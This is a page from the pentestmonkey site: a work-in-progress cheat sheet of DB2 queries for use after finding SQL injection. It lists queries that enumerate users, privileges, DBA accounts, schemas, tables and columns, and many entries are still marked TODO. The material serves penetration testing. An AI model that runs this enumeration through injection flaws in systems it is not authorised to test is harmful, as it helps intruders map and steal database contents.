DB2 SQL Injection Cheat Sheet

The DB2 SQL Injection Cheat Sheet provides a collection of SQL injection techniques specifically for DB2 databases, highlighting common queries and methods for exploiting vulnerabilities. It includes commands for user enumeration, listing databases, and retrieving privileges, among others, with notes on admin-only queries. The document is a work-in-progress and aims to assist pentesters in identifying and exploiting SQL injection vulnerabilities in DB2 applications.

pentestmonkey

Taking the monkey work out of pentesting

DB2 SQL Injection Cheat Sheet


Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though, it pays to be prepared…

Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is:

Oracle
MSSQL
MySQL
PostgreSQL
Ingres
DB2
Informix

I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.
Overview (2)
Version
    select versionnumber, version_timestamp from sysibm.sysversions;

Comments
    select blah from foo; -- comment like this

Current User
    select user from sysibm.sysdummy1;
    select session_user from sysibm.sysdummy1;
    select system_user from sysibm.sysdummy1;

List Users
    N/A (I think DB2 uses OS-level user accounts for authentication.)
    Database authorities (like roles, I think) can be listed like this:
    select grantee from syscat.dbauth;

List Password Hashes
    N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges
    select * from syscat.tabauth; -- privs on tables
    select * from syscat.dbauth where grantee = current user;
    select * from syscat.tabauth where grantee = current user;
    select * from SYSIBM.SYSUSERAUTH -- List db2 system privileges

List DBA Accounts
    select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'

Current Database
    select current server from sysibm.sysdummy1;

List Databases
    SELECT schemaname FROM syscat.schemata;

List Columns
    select name, tbname, coltype from sysibm.syscolumns;

List Tables
    select name from sysibm.systables;

Find Tables From Column Name
    select tbname from sysibm.syscolumns where name='username'

Select Nth Row
    select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char
    SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

Bitwise AND
    This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Char
    select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char -> ASCII Value
    select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting
    SELECT cast('123' as integer) FROM sysibm.sysdummy1;
    SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation
    SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
    select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

If Statement
    TODO

Case Statement
    TODO

Avoiding Quotes
    TODO

Time Delay
    ??? See Heavy Queries article for some ideas.

Make DNS Requests
    TODO

Command Execution
    TODO

Local File Access
    TODO

Hostname, IP Address
    TODO

Location of DB files
    TODO

Default/System Databases
    TODO

This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.

Thanks
Pentestmonkey gratefully acknowledges the contributions of:

r22mvk

Adrián for figuring out lots of the TODO items above: http://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/

Tags: cheatsheet, database, db2, pentest, sqlinjection

Posted in SQL Injection